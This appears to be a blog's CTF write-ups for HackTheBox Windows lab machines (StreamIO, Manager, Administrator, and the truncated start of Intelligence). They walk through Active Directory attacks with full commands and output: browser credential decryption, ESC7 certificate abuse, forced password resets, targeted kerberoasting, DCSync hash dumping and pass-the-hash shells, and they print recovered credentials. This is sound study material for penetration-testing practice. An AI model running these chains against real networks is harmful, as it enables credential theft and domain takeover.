C:\\Users\\nikk37\\AppData\\roaming\\mozilla\\Firefox\\Profiles\u0026gt; ls Directory: C:\\Users\\nikk37\\AppData\\roaming\\mozilla\\Firefox\\Profiles Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 2/22/2022 2:40 AM 5rwivk2l.default d----- 2/22/2022 2:42 AM br53rxeg.default-release download key4.db download logins.json python /opt/firepwd/firepwd.py globalSalt: b\u0026#39;d215c391179edb56af928a06c627906bcbd4bd47\u0026#39; SEQUENCE { SEQUENCE { OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2 SEQUENCE { SEQUENCE { OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2 SEQUENCE { OCTETSTRING b\u0026#39;5d573772912b3c198b1e3ee43ccb0f03b0b23e46d51c34a2a055e00ebcd240f5\u0026#39; INTEGER b\u0026#39;01\u0026#39; INTEGER b\u0026#39;20\u0026#39; SEQUENCE { OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256 } } } SEQUENCE { OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC OCTETSTRING b\u0026#39;1baafcd931194d48f8ba5775a41f\u0026#39; } } } OCTETSTRING b\u0026#39;12e56d1c8458235a4136b280bd7ef9cf\u0026#39; } clearText b\u0026#39;70617373776f72642d636865636b0202\u0026#39; password check? True SEQUENCE { SEQUENCE { OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2 SEQUENCE { SEQUENCE { OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2 SEQUENCE { OCTETSTRING b\u0026#39;098560d3a6f59f76cb8aad8b3bc7c43d84799b55297a47c53d58b74f41e5967e\u0026#39; INTEGER b\u0026#39;01\u0026#39; INTEGER b\u0026#39;20\u0026#39; SEQUENCE { OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256 } } } SEQUENCE { OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC OCTETSTRING b\u0026#39;e28a1fe8bcea476e94d3a722dd96\u0026#39; } } } OCTETSTRING b\u0026#39;51ba44cdd139e4d2b25f8d94075ce3aa4a3d516c2e37be634d5e50f6d2f47266\u0026#39; } clearText b\u0026#39;b3610ee6e057c4341fc76bc84cc8f7cd51abfe641a3eec9d0808080808080808\u0026#39; decrypting login/password pairs https://slack.streamio.htb:b\u0026#39;admin\u0026#39;,b\u0026#39;JDg0dd1s@d0p3cr3@t0r\u0026#39; https://slack.streamio.htb:b\u0026#39;nikk37\u0026#39;,b\u0026#39;n1kk1sd0p3t00:)\u0026#39; https://slack.streamio.htb:b\u0026#39;yoshihide\u0026#39;,b\u0026#39;paddpadd@12\u0026#39; https://slack.streamio.htb:b\u0026#39;JDgodd\u0026#39;,b\u0026#39;password@12\u0026#39; ","date":"6 March 2026","externalUrl":null,"permalink":"/ctf-writeups/streamio/","section":"CTF Writeups","summary":"","title":"StreamIO","type":"ctf-writeups"},{"content":" Manager # Overview # OS: Windows IP: 10.129.16.174 Difficulty: Medium Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Got creds, found backup file in mssql instance, got ravens password, rdp as raven and found certificate that was vulnerable.\nLoot # Loot Category Details Usernames operator raven | | Passwords | operator R4v3nBe5tD3veloP3r!123 | | Usernames+Passwords | operator:operator | | Hashes | | | Service Versions | |\nEnumeration # Nmap # nmap 10.129.16.174 -sCV -A -p- -Pn --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-05 16:05 EST Stats: 0:00:23 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 9.09% done; ETC: 16:06 (0:01:00 remaining) Nmap scan report for manager.htb (10.129.16.174) Host is up (0.11s latency). Not shown: 65513 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain (generic dns response: SERVFAIL) | fingerprint-strings: | DNS-SD-TCP: | _services | _dns-sd | _udp |_ local 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: Manager | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-05 21:16:21Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name) |_ssl-date: 2026-03-05T21:18:08+00:00; +10m46s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.manager.htb | Not valid before: 2024-08-30T17:08:51 |_Not valid after: 2122-07-27T10:31:04 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.manager.htb | Not valid before: 2024-08-30T17:08:51 |_Not valid after: 2122-07-27T10:31:04 |_ssl-date: 2026-03-05T21:18:08+00:00; +10m46s from scanner time. 1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM | ms-sql-info: | 10.129.16.174:1433: | Version: | name: Microsoft SQL Server 2019 RTM | number: 15.00.2000.00 | Product: Microsoft SQL Server 2019 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2026-03-05T19:42:03 |_Not valid after: 2056-03-05T19:42:03 | ms-sql-ntlm-info: | 10.129.16.174:1433: | Target_Name: MANAGER | NetBIOS_Domain_Name: MANAGER | NetBIOS_Computer_Name: DC01 | DNS_Domain_Name: manager.htb | DNS_Computer_Name: dc01.manager.htb | DNS_Tree_Name: manager.htb |_ Product_Version: 10.0.17763 |_ssl-date: 2026-03-05T21:18:08+00:00; +10m46s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.manager.htb | Not valid before: 2024-08-30T17:08:51 |_Not valid after: 2122-07-27T10:31:04 |_ssl-date: 2026-03-05T21:18:08+00:00; +10m46s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name) |_ssl-date: 2026-03-05T21:18:08+00:00; +10m46s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.manager.htb | Not valid before: 2024-08-30T17:08:51 |_Not valid after: 2122-07-27T10:31:04 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49693/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49694/tcp open msrpc Microsoft Windows RPC 49695/tcp open msrpc Microsoft Windows RPC 49728/tcp open msrpc Microsoft Windows RPC 49794/tcp open msrpc Microsoft Windows RPC 60102/tcp open unknown 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.95%I=7%D=3/5%Time=69A9F039%P=x86_64-pc-linux-gnu%r(DNS-S SF:D-TCP,30,\u0026#34;\\0\\.\\0\\0\\x80\\x82\\0\\x01\\0\\0\\0\\0\\0\\0\\t_services\\x07_dns-sd\\x04_ SF:udp\\x05local\\0\\0\\x0c\\0\\x01\u0026#34;); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019|10 (97%) OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10 Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2026-03-05T21:17:25 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: mean: 10m44s, deviation: 1s, median: 10m45s TRACEROUTE (using port 139/tcp) HOP RTT ADDRESS 1 104.29 ms 10.10.14.1 2 104.78 ms manager.htb (10.129.16.174) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 121.13 seconds Dirbusting # Shares # I validated this step using the evidence below before moving forward in the chain.\nWe have guest access for now which gives us these list of users\nlets validate these users\nRoasting # I validated this step using the evidence below before moving forward in the chain.\nlets see if there any roastables\nPort 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nwe got 1 user john due\nExploitation # well there is no way i could have figured out this without looking at the writeup. there is a user with the same username as their password, operator:operator\nthese creds seem to work with the mssql server so lets check that out\nwe in boy\ni rememeber i was able to grab the hash in escape box using mssql, so lets try that\nand boom\nDC01$::MANAGER:07489e9bc0d737fd:504098B64D5283ECFD78A04D0C271F86:010100000000000000E497B3E0ACDC01C72A08C41C5C03B500000000020008004F0045004700310001001E00570049004E002D003600310044004500520037003500300057003600520004003400570049004E002D00360031004400450052003700350030005700360052002E004F004500470031002E004C004F00430041004C00030014004F004500470031002E004C004F00430041004C00050014004F004500470031002E004C004F00430041004C000700080000E497B3E0ACDC0106000400020000000800300030000000000000000000000000300000C8AFBE34AA13F17AE1E68A154461AB999C327786E122BD47788EF1025D3A3F460A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100330037000000000000000000 lets crack it with hashcat\nok i dont think thats the intended path cuz its taking forever to crack\n0 wwwroot 1 0 SQL (MANAGER\\Operator guest@master)\u0026gt; xp_dirtree C:\\inetpub\\wwwroot subdirectory depth file ------------------------------- ----- ---- about.html 1 1 contact.html 1 1 css 1 0 images 1 0 index.html 1 1 js 1 0 service.html 1 1 web.config 1 1 website-backup-27-07-23-old.zip 1 1 SQL (MANAGER\\Operator guest@master)\u0026gt; xp_dirtree C:\\inetpub\\wwwroot there is an interesting file here, website_backup, lets grab it\nwget http://manager.htb/website-backup-27-07-23-old.zip we find this in the old.conf file\n\u0026lt;ldap-conf\u0026gt; \u0026lt;server\u0026gt; \u0026lt;host\u0026gt;dc01.manager.htb\u0026lt;/host\u0026gt; \u0026lt;open-port enabled=\u0026#34;true\u0026#34;\u0026gt;389\u0026lt;/open-port\u0026gt; \u0026lt;secure-port enabled=\u0026#34;false\u0026#34;\u0026gt;0\u0026lt;/secure-port\u0026gt; \u0026lt;search-base\u0026gt;dc=manager,dc=htb\u0026lt;/search-base\u0026gt; \u0026lt;server-type\u0026gt;microsoft\u0026lt;/server-type\u0026gt; \u0026lt;access-user\u0026gt; \u0026lt;user\u0026gt;raven@manager.htb\u0026lt;/user\u0026gt; \u0026lt;password\u0026gt;R4v3nBe5tD3veloP3r!123\u0026lt;/password\u0026gt; \u0026lt;/access-user\u0026gt; \u0026lt;uid-attribute\u0026gt;cn\u0026lt;/uid-attribute\u0026gt; \u0026lt;/server\u0026gt; \u0026lt;search type=\u0026#34;full\u0026#34;\u0026gt; \u0026lt;/search\u0026gt; \u0026lt;/ldap-conf\u0026gt; ravens creds, raven:R4v3nBe5tD3veloP3r!123\nshell as raven # I validated this step using the evidence below before moving forward in the chain.\nlets check for certificates with certipy\nhmm lets check on esc7\nESC 7 # (kali㉿kali)-[~/Desktop/Boxes/manager] └─$ certipy-ad ca \\ -u \u0026#39;raven@manager.htb\u0026#39; -p \u0026#39;R4v3nBe5tD3veloP3r!123\u0026#39; \\ -ns \u0026#39;10.129.16.174\u0026#39; -target \u0026#39;dc01.manager.htb\u0026#39; \\ -ca \u0026#39;manager-DC01-CA\u0026#39; -add-officer \u0026#39;raven\u0026#39; Certipy v5.0.3 - by Oliver Lyak (ly4k) [*] Successfully added officer \u0026#39;Raven\u0026#39; on \u0026#39;manager-DC01-CA\u0026#39; ┌──(kali㉿kali)-[~/Desktop/Boxes/manager] └─$ certipy-ad ca \\ -u \u0026#39;raven@manager.htb\u0026#39; -p \u0026#39;R4v3nBe5tD3veloP3r!123\u0026#39; \\ -ns \u0026#39;10.129.16.174\u0026#39; -target \u0026#39;dc01.manager.htb\u0026#39; \\ -ca \u0026#39;manager-DC01-CA\u0026#39; -enable-template \u0026#39;SubCA\u0026#39; Certipy v5.0.3 - by Oliver Lyak (ly4k) [*] Successfully enabled \u0026#39;SubCA\u0026#39; on \u0026#39;manager-DC01-CA\u0026#39; ┌──(kali㉿kali)-[~/Desktop/Boxes/manager] └─$ certipy-ad req \\ -u \u0026#39;raven@manager.htb\u0026#39; -p \u0026#39;R4v3nBe5tD3veloP3r!123\u0026#39; \\ -ns \u0026#39;10.129.16.174\u0026#39; -target \u0026#39;dc01.manager.htb\u0026#39; \\ -ca \u0026#39;manager-DC01-CA\u0026#39; -template \u0026#39;SubCA\u0026#39; -upn \u0026#39;administrator@manager.htb\u0026#39; Certipy v5.0.3 - by Oliver Lyak (ly4k) [*] Requesting certificate via RPC [*] Request ID is 20 [-] Got error while requesting certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate. Would you like to save the private key? (y/N): y [*] Saving private key to \u0026#39;20.key\u0026#39; [*] Wrote private key to \u0026#39;20.key\u0026#39; [-] Failed to request certificate ┌──(kali㉿kali)-[~/Desktop/Boxes/manager] └─$ certipy-ad ca \\ -u \u0026#39;raven@manager.htb\u0026#39; -p \u0026#39;R4v3nBe5tD3veloP3r!123\u0026#39; \\ -ns \u0026#39;10.129.16.174\u0026#39; -target \u0026#39;dc01.manager.htb\u0026#39; \\ -ca \u0026#39;manager-DC01-CA\u0026#39; -issue-request \u0026#39;20\u0026#39; Certipy v5.0.3 - by Oliver Lyak (ly4k) [*] Successfully issued certificate request ID 20 ┌──(kali㉿kali)-[~/Desktop/Boxes/manager] └─$ certipy-ad req \\ -u \u0026#39;raven@manager.htb\u0026#39; -p \u0026#39;R4v3nBe5tD3veloP3r!123\u0026#39; \\ -ns \u0026#39;10.129.16.174\u0026#39; -target \u0026#39;dc01.manager.htb\u0026#39; \\ -ca \u0026#39;manager-DC01-CA\u0026#39; -retrieve \u0026#39;20\u0026#39; Certipy v5.0.3 - by Oliver Lyak (ly4k) [*] Retrieving certificate with ID 20 [*] Successfully retrieved certificate [*] Got certificate with UPN \u0026#39;administrator@manager.htb\u0026#39; [*] Certificate has no object SID [*] Loaded private key from \u0026#39;20.key\u0026#39; [*] Saving certificate and private key to \u0026#39;administrator.pfx\u0026#39; [*] Wrote certificate and private key to \u0026#39;administrator.pfx\u0026#39; ┌──(kali㉿kali)-[~/Desktop/Boxes/manager] └─$ sudo ntpdate manager.htb [sudo] password for kali: 2026-03-05 22:25:02.595217 (-0500) +2847.757318 +/- 0.052799 manager.htb 10.129.16.174 s1 no-leap CLOCK: time stepped by 2847.757318 ┌──(kali㉿kali)-[~/Desktop/Boxes/manager] └─$ certipy-ad auth -pfx \u0026#39;administrator.pfx\u0026#39; -dc-ip \u0026#39;10.129.16.174\u0026#39; Certipy v5.0.3 - by Oliver Lyak (ly4k) [*] Certificate identities: [*] SAN UPN: \u0026#39;administrator@manager.htb\u0026#39; [*] Using principal: \u0026#39;administrator@manager.htb\u0026#39; [*] Trying to get TGT... [*] Got TGT [*] Saving credential cache to \u0026#39;administrator.ccache\u0026#39; [*] Wrote credential cache to \u0026#39;administrator.ccache\u0026#39; [*] Trying to retrieve NT hash for \u0026#39;administrator\u0026#39; [*] Got hash for \u0026#39;administrator@manager.htb\u0026#39;: aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef $ lets now authenticate\n┌──(kali㉿kali)-[~/Desktop/Boxes/manager] └─$ evil-winrm -i manager.htb -u administrator@manager.htb -H \u0026#39;ae5064c2f62317332c88629e025924ef\u0026#39; Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc\u0026#39; for module Reline Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\\Users\\Administrator\\Documents\u0026gt; ","date":"5 March 2026","externalUrl":null,"permalink":"/ctf-writeups/manager/","section":"CTF Writeups","summary":"","title":"Manager","type":"ctf-writeups"},{"content":" Administrator # Overview # OS: Windows IP: 10.129.16.22 Difficulty: Medium Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Got creds, abused genericwrite then forechange pass and then cracked psafe file got creds, used it to abuse dsync nd got admin.\nLoot # Loot Category Details Usernames Olivia michael Benjamin emily ethan | | Passwords | ichliebedich Password tekieromucho UXLCI5iETUsIBoFVTj8yQFKoHjXmb limpkizkit | | Usernames+Passwords | Olivia:ichliebedich michael:Password benjamin:Password emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb ethan:limpkizkit | | Hashes | | | Service Versions | |\nEnumeration # Nmap # $ nmap 10.129.16.22 -sCV -A -Pn -p- --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-04 22:47 EST Warning: 10.129.16.22 giving up on port because retransmission cap hit (10). Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 64.00% done; ETC: 22:48 (0:00:29 remaining) Nmap scan report for 10.129.16.22 Host is up (0.099s latency). Not shown: 65457 closed tcp ports (reset), 53 filtered tcp ports (no-response) PORT STATE SERVICE VERSION **21/tcp open ftp Microsoft ftpd** | ftp-syst: |_ SYST: Windows_NT 53/tcp open domain Simple DNS Plus **88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-05 02:49:21Z) 135/tcp open msrpc Microsoft Windows RPC** 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped **5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)** |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf .NET Message Framing **47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0** |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49696/tcp open msrpc Microsoft Windows RPC 50789/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 50794/tcp open msrpc Microsoft Windows RPC 50801/tcp open msrpc Microsoft Windows RPC 50814/tcp open msrpc Microsoft Windows RPC No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: Network Distance: 2 hops Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2026-03-05T02:50:38 |_ start_date: N/A |_clock-skew: -57m48s | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required TRACEROUTE (using port 110/tcp) HOP RTT ADDRESS 1 99.86 ms 10.10.14.1 2 97.71 ms 10.129.16.22 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 91.91 seconds Dirbusting # Lets see what all we have access to with this user\nWe got more users\nlets check for all if any cred reuse\nok so olivia seems to be the only legit cred then\nSMB # ──(kali㉿kali)-[~/Desktop/Boxes/Administrator] └─$ impacket-smbclient Olivia:ichliebedich@10.129.16.22 Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies Type help for list of commands ## ls [-] No share selected ## shares ADMIN$ C$ IPC$ NETLOGON SYSVOL ## cd IPC$ [-] No share selected ## use IPC$ ## ls -rw-rw-rw- 3 Sun Dec 31 19:03:58 1600 InitShutdown -rw-rw-rw- 5 Sun Dec 31 19:03:58 1600 lsass -rw-rw-rw- 3 Sun Dec 31 19:03:58 1600 ntsvcs -rw-rw-rw- 3 Sun Dec 31 19:03:58 1600 scerpc -rw-rw-rw- 1 Sun Dec 31 19:03:58 1600 Winsock2\\CatalogChangeListener-2a8-0 -rw-rw-rw- 1 Sun Dec 31 19:03:58 1600 Winsock2\\CatalogChangeListener-398-0 -rw-rw-rw- 3 Sun Dec 31 19:03:58 1600 epmapper -rw-rw-rw- 1 Sun Dec 31 19:03:58 1600 Winsock2\\CatalogChangeListener-204-0 -rw-rw-rw- 3 Sun Dec 31 19:03:58 1600 LSM_API_service -rw-rw-rw- 1 Sun Dec 31 19:03:58 1600 Winsock2\\CatalogChangeListener-3d0-0 -rw-rw-rw- 3 Sun Dec 31 19:03:58 1600 eventlog -rw-rw-rw- 1 Sun Dec 31 19:03:58 1600 Winsock2\\CatalogChangeListener-4f4-0 -rw-rw-rw- 3 Sun Dec 31 19:03:58 1600 atsvc -rw-rw-rw- 1 Sun Dec 31 19:03:58 1600 Winsock2\\CatalogChangeListener-630-0 -rw-rw-rw- 4 Sun Dec 31 19:03:58 1600 wkssvc -rw-rw-rw- 1 Sun Dec 31 19:03:58 1600 Winsock2\\CatalogChangeListener-2a8-1 -rw-rw-rw- 1 Sun Dec 31 19:03:58 1600 Winsock2\\CatalogChangeListener-6a4-0 -rw-rw-rw- 3 Sun Dec 31 19:03:58 1600 RpcProxy\\50789 -rw-rw-rw- 3 Sun Dec 31 19:03:58 1600 30ce14a5eb4655a1 -rw-rw-rw- 3 Sun Dec 31 19:03:58 1600 RpcProxy\\593 -rw-rw-rw- 5 Sun Dec 31 19:03:58 1600 srvsvc -rw-rw-rw- 3 Sun Dec 31 19:03:58 1600 netdfs -rw-rw-rw- 3 Sun Dec 31 19:03:58 1600 tapsrv -rw-rw-rw- 1 Sun Dec 31 19:03:58 1600 vgauth-service -rw-rw-rw- 3 Sun Dec 31 19:03:58 1600 ROUTER -rw-rw-rw- 1 Sun Dec 31 19:03:58 1600 Winsock2\\CatalogChangeListener-294-0 -rw-rw-rw- 3 Sun Dec 31 19:03:58 1600 W32TIME_ALT -rw-rw-rw- 1 Sun Dec 31 19:03:58 1600 Winsock2\\CatalogChangeListener-bdc-0 -rw-rw-rw- 1 Sun Dec 31 19:03:58 1600 PIPE_EVENTROOT\\CIMV2SCM EVENT PROVIDER -rw-rw-rw- 1 Sun Dec 31 19:03:58 1600 Winsock2\\CatalogChangeListener-bc4-0 ## cd .. ## shares ADMIN$ C$ IPC$ NETLOGON SYSVOL ## use NETLOGON ## ls drw-rw-rw- 0 Fri Oct 4 15:49:22 2024 . drw-rw-rw- 0 Fri Oct 4 15:54:15 2024 .. ## use SYSVOL ## ls drw-rw-rw- 0 Fri Oct 4 15:49:22 2024 . drw-rw-rw- 0 Fri Oct 4 15:49:22 2024 .. drw-rw-rw- 0 Fri Oct 4 15:49:22 2024 administrator.htb ## cd administrator.htb ## ls drw-rw-rw- 0 Fri Oct 4 15:54:15 2024 . drw-rw-rw- 0 Fri Oct 4 15:49:22 2024 .. drw-rw-rw- 0 Wed Mar 4 21:49:38 2026 DfsrPrivate drw-rw-rw- 0 Fri Oct 4 15:49:22 2024 Policies drw-rw-rw- 0 Fri Oct 4 15:49:22 2024 scripts ## cd scripts ## ls drw-rw-rw- 0 Fri Oct 4 15:49:22 2024 . drw-rw-rw- 0 Fri Oct 4 15:54:15 2024 .. ## cd .. ## cd Policies ## ls drw-rw-rw- 0 Fri Oct 4 15:49:22 2024 . drw-rw-rw- 0 Fri Oct 4 15:54:15 2024 .. drw-rw-rw- 0 Fri Oct 4 15:49:22 2024 {31B2F340-016D-11D2-945F-00C04FB984F9} drw-rw-rw- 0 Fri Oct 4 15:49:22 2024 {6AC1786C-016F-11D2-945F-00C04fB984F9} ## cd .. ## cd DfsrPrivate [-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights. ## ls drw-rw-rw- 0 Fri Oct 4 15:54:15 2024 . drw-rw-rw- 0 Fri Oct 4 15:49:22 2024 .. drw-rw-rw- 0 Wed Mar 4 21:49:38 2026 DfsrPrivate drw-rw-rw- 0 Fri Oct 4 15:49:22 2024 Policies drw-rw-rw- 0 Fri Oct 4 15:49:22 2024 scripts Nothing great here\nRoasting # ┌──(kali㉿kali)-[~/Desktop/Boxes/Administrator] └─$ ./kerbrute userenum --dc 10.129.16.22 -d administrator.htb users.txt -v __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \\/ ___/ __ \\/ ___/ / / / __/ _ \\ / ,\u0026lt; / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\\___/_/ /_.___/_/ \\__,_/\\__/\\___/ Version: v1.0.3 (9dad6e1) - 03/04/26 - Ronnie Flathers @ropnop 2026/03/04 23:09:47 \u0026gt; Using KDC(s): 2026/03/04 23:09:47 \u0026gt; 10.129.16.22:88 2026/03/04 23:09:47 \u0026gt; [+] VALID USERNAME: Administrator@administrator.htb 2026/03/04 23:09:47 \u0026gt; [!] krbtgt@administrator.htb - USER LOCKED OUT 2026/03/04 23:09:47 \u0026gt; [!] Guest@administrator.htb - USER LOCKED OUT 2026/03/04 23:09:47 \u0026gt; [!] emma@administrator.htb - USER LOCKED OUT 2026/03/04 23:09:47 \u0026gt; [+] VALID USERNAME: emily@administrator.htb 2026/03/04 23:09:47 \u0026gt; [+] VALID USERNAME: ethan@administrator.htb 2026/03/04 23:09:47 \u0026gt; [+] VALID USERNAME: benjamin@administrator.htb 2026/03/04 23:09:47 \u0026gt; [+] VALID USERNAME: michael@administrator.htb 2026/03/04 23:09:47 \u0026gt; [!] alexander@administrator.htb - USER LOCKED OUT 2026/03/04 23:09:52 \u0026gt; [+] VALID USERNAME: Olivia@administrator.htb 2026/03/04 23:09:52 \u0026gt; Done! Tested 10 usernames (6 valid) in 5.271 seconds ┌──(kali㉿kali)-[~/Desktop/Boxes/Administrator] └─$ validated the users\nExploitation # after all those checks we can now begin w the winrm sesh\nno interesting privs\nPRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled we have generic all over michael\nMichael # lets go to michael\ncertipy-ad shadow auto -u krishna@ignite.local -p Password@1 -account management_svc certipy-ad shadow auto \\ -u Olivia@administrator.htb \\ -p \u0026#39;ichliebedich\u0026#39; \\ -account michael \\ -dc-ip 10.129.16.22 \\ -target dc.administrator.htb Well that does not seem to work, lets just use the abuse we see on bloodhound\nnet rpc password \u0026#34;michael\u0026#34; \u0026#34;Password\u0026#34; -U \u0026#34;administrator.htb\u0026#34;/\u0026#34;Olivia\u0026#34;%\u0026#34;ichliebedich\u0026#34; -S \u0026#34;administrator.htb\u0026#34; lets change his password\ngreat we got access to michael, lets see if michaels got any outbound\nBenjamin # wow, we just gotta do the same thing now\nnet rpc password \u0026#34;benjamin\u0026#34; \u0026#34;Password\u0026#34; -U \u0026#34;administrator.htb\u0026#34;/\u0026#34;michael\u0026#34;%\u0026#34;Password\u0026#34; -S \u0026#34;administrator.htb\u0026#34; ok so for some reason benjamin does not have a winrm shell, BUT he has ftp\nlets grab this file\nlets use pwsafe\nahh lets check the shares as benjamin\nnothing interesting on the shares\nhmm lets try cracking the file\nnow we can\ntoo much time lets just use hashcat instead\nlets use 5200\ntekieromucho lets use this cred to open the database\nso we have these users out of these, only emily is a valid user\nso lets check her file\nthese are the creds we have\nfor emily we have\nemily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb now lets spray against emily\nwe have now a winrm session as emilly\nEmily # we have generic write over ethan\nlets try the targeted kerberoast\nTargeted Kerberoast # source venv/bin/activate uv add --script targetedKerberoast.py -r requirements.txt sudo ntpdate administrator.htb uv run targetedKerberoast.py -v -d \u0026#39;administrator.htb\u0026#39; -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb or **python targetedKerberoast.py -v -d \u0026#39;administrator.htb\u0026#39; -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb** lets crack it\nhashcat ethan.hash /opt/SecLists/Passwords/Leaked-Databases/rockyou.tx aand we get\nlimpkizkit as the password for ethan\nAdministrator # so apparently ethan has DC sync over the administratorhtb domain\nlets dump hashes for the domain with secretsdump\nsecretsdump.py ethan:limpbizkit@dc.administrator.htb lets pth and grab our files\nevil-winrm -i dc.administrator.htb -u administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e ","date":"4 March 2026","externalUrl":null,"permalink":"/ctf-writeups/administrator/","section":"CTF Writeups","summary":"","title":"Administrator","type":"ctf-writeups"},{"content":" Intelligence # Overview # OS: Windows IP: 10.129.95.154 Difficulty: Medium Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Got initial access thjrough default creds found by enumerating pdf files, got in added our dns captured hash with responder and then passed the hash to grab pass of service acccount, used service account to grab the admin hash because it had allowedtodelegate over a machine.\nLoot # Loot Category Details Usernames Ted.Graves Passwords NewIntelligenceCorpUser9876,Mr.Teddy Usernames+Passwords Tiffany.Molina:NewIntelligenceCorpUser9876 Ted.Graves:MrTeddy | | Hashes | | | Service Versions | |\nEnumeration # Nmap # └─$ nmap -sU --min-rate=20000 10.129.95.154 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-03 15:36 